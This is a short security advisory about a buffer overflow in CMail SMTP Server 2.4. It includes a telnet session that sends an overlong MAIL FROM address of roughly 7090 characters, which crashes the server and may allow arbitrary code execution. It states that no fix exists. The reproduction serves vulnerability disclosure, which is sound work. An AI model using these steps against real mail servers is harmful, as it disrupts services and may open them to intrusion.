COMMAND

    CMail SMTP Server

SYSTEMS AFFECTED

    CMail SMTP Server Version 2.4

PROBLEM

    Luciano Martins found a buffer overflow in the CMail SMTP  service
    (long MAIL FROM:) that may allow an attacker to execute  arbitrary
    code on the  target server, it  is based on  the eEye pointed  out
    overflows  in  cmail  2.3...  which  was  never  fixed... software
    vendors still not taking security issues seriously.  Example:

        [cham@guilt cham]$ telnet example.com 25
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        220  SMTP services ready. Computalynx CMail Server Version: 2.4
        helo ussr
        250 Hello ussr [yourip], how are you today?
        MAIL FROM: cmail <[buffer]@cmaildotcom.com>

    Where [buffer] is aprox. 7090 characters. At his point the  server
    overflows and crashes.  Just a typical buffer overflow that should
    have been fixed in version 2.3 when it was pointed out to them.

SOLUTION

    Nothing yet.